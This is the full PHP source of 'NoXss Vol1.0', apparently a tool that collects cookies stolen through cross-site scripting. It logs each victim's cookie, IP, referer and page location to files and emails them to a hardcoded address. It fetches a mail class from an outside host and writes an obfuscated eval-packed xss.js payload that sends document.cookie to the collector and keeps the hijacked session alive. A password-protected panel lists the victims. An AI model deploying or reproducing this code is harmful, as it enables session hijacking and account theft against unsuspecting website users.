NoXss Vol1.0
<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING $password = ''; // PASSWORD OF DOUBLE MD5 $smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE $smtpserverport = 25; // SMTP PORT $smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER $smtpemailto = 'inoevil@qq.com'; // SENT TO $smtpuser = 'noevilsparrow@yahoo.cn'; // SMTP USER $smtppass = ''; // SMTP PASS // INIT $shell = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $path = substr($shell, 0, strrpos($_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'], '/')); if(!file_exists('cookie') && !is_dir('cookie')) { mkdir('cookie',0777); } else if(!file_exists('session') && !is_dir('session')) { mkdir('session',0777); } else if(!file_exists('mail.php')) { AppGetClass('https://files.cnblogs.com/noevil/class.mail.js'); } include ('mail.php'); // GET ACTION if (isset($_GET['cookie'])) { // GET XSS COOKIE INFO $xss_hash = md5($xss_ip); $xss_date = date('Y/m/d H:i:s'); $xss_ip = getenv ('REMOTE_ADDR'); $xss_location = $_GET['location']; $xss_referer = getenv('HTTP_REFERER'); $xss_cookie = $_GET['cookie']; AppSaveXss($xss_hash, $xss_date, $xss_ip, $xss_location, $xss_referer, $xss_cookie); // SEND MAIL global $shell; $contents = ' <p>Date : '.$xss_date.'</p> <p>IP : '.$xss_ip.'</p> <p>Location : '.$xss_location.'</p> <p>Referer : '.$xss_referer.'</p> <p>Cookie : '.$xss_cookie.'</p> <p>Hash : '.md5($xss_ip).'</p> <p>NoXss : '.$shell.'</p> '; AppSendMail('A Xss Info Had Got!' ,$contents); } else if (isset($_GET['session'])) { // KEEP SESSION $xss_cookie = $_GET['session']; AppKeepSession($xss_ip); } else if ($_GET['act'] == 'js') { // RECREATE XSS.JS if (AppCheck($password)) AppCreateJs(); } else if ($_GET['act'] == 'view') { // VIEW NOC LIST if (AppCheck($password)) AppReadNox(); } else if ($_GET['act'] == 'del') { // DELETE NOC FILE if (AppCheck($password)) AppDelNox(); } else { // CHECK LOGIN if (AppCheck($password)) AppViewXss(); } // CHECK LOGIN function AppCheck($_p) { $pwd = $_GET['pass']; if (md5(md5($pwd)) != $_p) { echo 'Fuck You!'; } else { return true; } } // SAVE XSS function AppSaveXss($_h, $_d, $_i, $_l, $_r, $_c) { $fp = fopen('./cookie/'.date("Y-m-d-H-i-s").'.noc', 'a'); fwrite($fp, $_h."\r\n"); fwrite($fp, 'Date: '.$_d."\r\n"); fwrite($fp, 'IP: '.$_i."\r\n"); fwrite($fp, 'Location: '.$_l."\r\n"); fwrite($fp, 'Referer: '.$_r."\r\n"); fwrite($fp, 'Cookie: '.$_c); fclose($fp); } // SEND MAIL function AppSendMail($_t, $_c) { global $smtpserver; global $smtpserverport; global $smtpusermail; global $smtpemailto; global $smtpuser; global $smtppass; $smtp = new smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass); $smtp->debug = FALSE; $smtp->sendmail($smtpemailto, $smtpusermail, $_t, $_c, 'HTML'); } // VIEW OUTPUT function AppViewXss() { global $smtpusermail; global $smtpemailto; // OUTPUT HEADER print_r(' <HTML> <HEAD> <TITLE>NoXss</TITLE> <STYLE type="text/css"> body,th,td { font:12px Verdana,Tahoma,sans-serif; color:black; line-height:140%; } .info li { line-height:35px; border-bottom:1px dashed #DDD; border-bottom-width:1px; border-bottom-style:dashed; border-bottom-color:#DDD; clear:both; } th { font-weight:bold; text-align:left; } th,td { line-height:35px; border-bottom:1px dashed #DDD; border-bottom-width:1px; border-bottom-style:dashed; border-bottom-color:#DDD; clear:both; } ul,ol { list-style:none; list-style-type:none; list-style-position:initial; list-style-image:initial; } li { display:list-item; } </STYLE> </HEAD> <BODY> '); print_r('<ul class="info">'); // OUTPUT SIMPLE INFO global $path; $noc = AppGetNox('cookie'); print_r(' <li><h1>NoXss</h1></li> <li> Date: <font color="#CC0000">'.date('Y/m/d H:i:s').' </font> Host: <font color="#CC0000">'.$_SERVER['HTTP_HOST'].' ('.gethostbyname($_SERVER['SERVER_NAME']).') </font> Count: <font color="#CC0000">'.count($noc).' </font> </li> <li> SEND USER: <font color="#CC0000">'.$smtpusermail.' </font> SEND TO: <font color="#CC0000">'.$smtpemailto.' </font> </li> <li>Use Example: <font color="#CC0000"><SCRIPT SRC="HTTP://'.$path.'/xss.js"></SCRIPT> </font> [<a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'].'&act=js">Creat Js</a>]</li> '); // OUTPUT TABLE HEADER print_r(' <li> <table> <tr> <th width="180px">Name</th> <th width="200px">Date</th> <th width="150px">Ip </th> <th width="420px">Referer</th> <th width="100px">Status</th> <th width="100px">Action</th> </tr> '); // OUTPUT NOC LIST for ($i=count($noc)-1; $i>=0; $i--) { // READ NOC FILE $nocfile = file('./cookie/'.$noc[$i].'.noc'); $j = 0; foreach($nocfile as &$line) { $nocdata[$j] = $line; $j++; } print_r(' <tr> <td>['.$noc[$i].']</td> <td>'.$nocdata[1].'</td> <td>'.$nocdata[2].'</td> <td title="'.$nocdata[4].'">'.AppSubStr($nocdata[4], 0, 55).'</td> <td>'.AppCheckStatus($nocdata[0]).'</td> <td>[ <a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=view&noc='.$noc[$i].'" target="_blank"> <font color="#ff6600">View</font></a> | <a href="http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'&act=del&noc='.$noc[$i].'"> <font color="#ff6600">Delete</font></a> ]</td> </tr> '); } // OUTPUT FOOTER print_r(' </table></li> <li><font color="#DDDDDD">Code By : NoevilSparrow @:no3er@qq.com Version: 1.0</font></li> </ul></BODY></HTML> '); } // KEEP SESSION function AppKeepSession($_c) { $session_hash = md5($_c); // CLEAN SESSION if (!is_dir('session/'.date('YmdH'))) { // CREATE FOLDER AND DELETE OTHERS mkdir('session/'.date('YmdH')); $handle = @opendir('./session/'); for ($i=0; $dir = @readdir($handle); $i++) { if (@is_dir('./session/'.$dir) && $dir!='.' && $dir!='..') { if ($dir != date('YmdH')) { AppCleanSession('./session/'.$dir); } } } closedir($handle); } // RECORD SESSION if (!file_exists('./session/'.date('YmdH').'/'.$session_hash.'.nos')) { $fp = fopen('./session/'.date('YmdH').'/'.$session_hash.'.nos', 'a'); fwrite($fp, $session_hash); fclose($fp); } } // CLEAN SESSION function AppCleanSession($_d) { $dh = opendir($_d); while ($file = readdir($dh)) { if($file!='.' && $file!='..') { $fullpath = $_d.'/'.$file; if(!is_dir($fullpath)) { unlink($fullpath); } else { AppCleanSession($fullpath); } } } closedir($dh); if(rmdir($_d)) { return true; } else { return false; } } // CHECK STATUS function AppCheckStatus($_h) { $_h = trim($_h); if (file_exists('./session/'.date('YmdH').'/'.$_h.'.nos')) { return '<font color="#006600">Keeping</font>'; } else { return '<font color="#0000FF">Lost</font>'; } } // READ NOC LIST function AppGetNox($_p) { if (is_dir($_p)) { if ($handle = opendir($_p)) { for ($i=0; ($file = readdir($handle)) !== false; ) { if($file != "." && $file != ".." && $file != "Thumbs.db") { $temp = explode('.',$file); $_r[$i] = $temp[0]; $i++; } } closedir($handle); } } return $_r; } // DOWNLOAD MAIL CLASS function AppGetClass($_u) { $file = fopen ($_u, 'rb'); if ($file) { $fp = fopen('mail.php', 'wb'); if ($fp) while(!feof($file)) { fwrite($fp, fread($file, 1024*8 ), 1024*8); } } if ($file) { fclose($file); } if ($fp) { fclose($fp); } } // RE CREATE XSS.JS function AppCreateJs() { global $shell; $fp = fopen('xss.js', 'w'); fwrite($fp, 'var _u = "http://'.$shell.'";'); fwrite($fp, 'eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'1 6="3="+9(b.3)+"&8="+l.8;1 i="m="+9(b.3);1 0=a 7();1 2=a 7();5();e();4 5(){0.c("j",k+"?"+6,g);0.h(d);p 0}4 f(){2.c("j",k+"?"+i,g);2.h(d)}4 e(){n.q("f()",o)}\',27,27,\'_hc|var|_hs|cookie|function|C|_c|XMLHttpRequest|location|escape|new|document|open|null|K|S|true|send|_s|GET|_u|top|session|window|60000|delete|setInterval\'.split(\'|\'),0,{})) '); fclose($fp); print_r('<script type="text/javascript">history.back();</script>'); } // STRING SUB function AppSubStr($_s, $_f, $_l = null) { preg_match_all('/./u', $_s, $match); $strlength = count($match[0]); if (is_null($_l) || $strlength < $_l) { $result = implode('', array_slice($match[0], $_f)); } else { $result = implode('', array_slice($match[0], $_f, $_l)).'...'; } return $result; } // READ NOC FILE function AppReadNox() { $nocfile = file('./cookie/'.$_GET['noc'].'.noc'); foreach($nocfile as &$line) { print_r($line.'<br>'); } } // DELETE NOC FILE function AppDelNox() { if (!unlink('./cookie/'.$_GET['noc'].'.noc')) { print_r('<script type="text/javascript">alert("What is the fuck!");history.back();</script>'); } else { print_r('<script type="text/javascript">top.location="'.getenv('HTTP_REFERER').'";</script>'); } } ?>